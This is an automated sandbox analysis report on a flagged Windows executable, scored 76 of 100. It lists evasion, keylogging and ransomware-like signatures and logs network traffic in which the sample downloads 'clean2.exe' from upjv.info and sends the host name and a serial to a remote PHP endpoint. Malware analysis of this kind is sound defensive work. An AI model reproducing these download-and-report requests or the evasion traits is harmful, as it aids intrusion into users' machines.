Windows Analysis Report
SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe

Overview

General Information

Sample name: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe
Analysis ID: 1538480
MD5: 36f1b6a1df5c33a33dba8396c877062d
SHA1: b0bf0049d0f56a60056802ca484d96d28584fe61
SHA256: 5dfc2387cbc7e73e92ca2d4526a73a812bb61a7d8a6a8f900170dbcffc9394d5
Tags: exe
Infos:

Detection

Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
AI detected suspicious sample
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Obfuscated command line found
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Yara detected BatToExe compiled binary
Connects to many different domains
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe ReversingLabs: Detection: 23%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 84.3% probability
Machine Learning detection for sample
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe File created: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\License.txt Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe File created: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\readme.txt Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe File created: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip64\License.txt Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe File created: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip64\readme.txt Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe File created: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\DefaultData\settings\settings_readme.txt Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe File created: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\readme.txt Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe File created: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\Other\Source\LauncherLicense.txt Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe File created: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\Other\Source\Readme.txt Jump to behavior
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:49774 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:49780 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:49788 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:49867 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:49894 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:49893 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:49927 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:49928 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.222.236.120:443 -> 192.168.2.5:49930 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:49937 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:49939 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:49940 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:49938 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50030 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50031 version: TLS 1.2
Source: Binary string: NapiNSP.pdbUGP source: firefox.exe, 00000011.00000003.2508775813.00000243577B6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: NapiNSP.pdb source: firefox.exe, 00000011.00000003.2508775813.00000243577B6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: netprofm.pdb source: firefox.exe, 00000011.00000003.2504585407.0000024369605000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: netprofm.pdbUGP source: firefox.exe, 00000011.00000003.2504585407.0000024369605000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Code function: 5_2_00403E37 FindFirstFileW, 5_2_00403E37
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Code function: 10_2_00C55869 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW, 10_2_00C55869
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Code function: 10_2_00C575DA FindFirstFileW, 10_2_00C575DA
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Code function: 5_2_0040451D __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW, 5_2_0040451D
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe File opened: C:\Users\user\TMP\cr-20241021-53901\'\ Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe File opened: C:\Users\user\TMP\cr-20241021-53901\'\Users\user\ Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe File opened: C:\Users\user\TMP\cr-20241021-53901\'\Users\user\TMP\cr-20241021-53901'\ Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe File opened: C:\Users\user\TMP\cr-20241021-53901\'\Users\ Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe File opened: C:\Users\user\TMP\cr-20241021-53901\ Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe File opened: C:\Users\user\TMP\cr-20241021-53901\'\Users\user\TMP\ Jump to behavior
Source: firefox.exe Memory has grown: Private usage: 1MB later: 248MB

Networking
barindex
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Connects to many different domains
Source: unknown Network traffic detected: DNS query count 31
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKdate: Mon, 21 Oct 2024 09:39:03 GMTcontent-type: application/x-msdownloadcontent-length: 2521803last-modified: Tue, 03 May 2022 21:28:28 GMTx-iplb-request-id: 90D90206:BED6_D5BA2111:0050_67162137_4F9F4:52D1Age: 0X-CDN-Cache: MISSX-CDN-Request-ID: 509182289X-CDN-Pop: bhsAccept-Ranges: bytesConnection: keep-aliveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f9 08 ad 42 bd 69 c3 11 bd 69 c3 11 bd 69 c3 11 d2 76 c8 11 be 69 c3 11 3e 75 cd 11 b5 69 c3 11 d2 76 c9 11 b6 69 c3 11 d2 76 c7 11 bf 69 c3 11 33 61 9c 11 bf 69 c3 11 bd 69 c2 11 1d 69 c3 11 3e 61 9e 11 b0 69 c3 11 8b 4f c8 11 e5 69 c3 11 8b 4f c9 11 be 69 c3 11 a6 f4 69 11 b2 69 c3 11 a6 f4 5d 11 bf 69 c3 11 7a 6f c5 11 bc 69 c3 11 52 69 63 68 bd 69 c3 11 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 40 05 e7 5a 00 00 00 00 00 00 00 00 e0 00 2f 01 0b 01 06 00 00 94 02 00 00 d0 00 00 00 00 00 00 9c 76 02 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 b0 03 00 00 04 00 00 00 00 00 00 02 00 00 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 09 03 00 8c 00 00 00 00 80 03 00 90 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 02 00 34 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c5 92 02 00 00 10 00 00 00 94 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b0 64 00 00 00 b0 02 00 00 66 00 00 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 45 00 00 00 20 03 00 00 02 00 00 00 fe 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 73 78 64 61 74 61 00 04 00 00 00 00 70 03 00 00 02 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 02 00 c0 2e 72 73 72 63 00 00 00 90 20 00 00 00 80 03 00 00 22 00 00 00 02 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 34.149.100.209 34.149.100.209
Source: Joe Sandbox View IP Address: 34.117.188.166 34.117.188.166
Source: Joe Sandbox View IP Address: 52.222.236.120 52.222.236.120
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: OVHFR OVHFR
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKdate: Mon, 21 Oct 2024 09:39:22 GMTcontent-type: text/html; charset=UTF-8x-powered-by: PHP/8.1content-encoding: gzipx-iplb-request-id: 90D90209:D366_D5BA2111:0050_6716214E_6C4F4:29F2Age: 0X-CDN-Cache: MISSX-CDN-Request-ID: 282493564X-CDN-Pop: bhsAccept-Ranges: bytesContent-Length: 59Connection: keep-aliveData Raw: 1f 8b 08 00 00 00 00 00 00 03 7a bf 7b bf 82 82 42 70 6a 51 66 62 8e 5f 69 6e 52 6a 91 82 ad 82 b1 a5 8f ae 87 a1 a1 ae 91 99 02 17 00 00 00 ff ff 03 00 a0 c3 7e ec 21 00 00 00 Data Ascii: z{BpjQfb_inRj~!
Source: global traffic HTTP traffic detected: GET /clean/clean2.exe HTTP/1.1User-Agent: aria2/1.36.0Accept: */*,application/metalink4+xml,application/metalink+xmlHost: upjv.infoWant-Digest: SHA-512;q=1, SHA-256;q=1, SHA;q=0.1
Source: global traffic HTTP traffic detected: GET /clean/entree.php?poste=user-PC^&serial=F2LEUD3EOH HTTP/1.1User-Agent: aria2/1.36.0Accept: */*,application/metalink4+xml,application/metalink+xmlHost: upjv.infoWant-Digest: SHA-512;q=1, SHA-256;q=1, SHA;q=0.1
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /clean/clean.php?serial=F2LEUD3EOH HTTP/1.1Host: upjv.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-aliveUpgrade-Insecure-Requests: 1
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: upjv.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: image/avif,image/webp,*/*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-aliveReferer: http://upjv.info/clean/clean.php?serial=F2LEUD3EOH
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
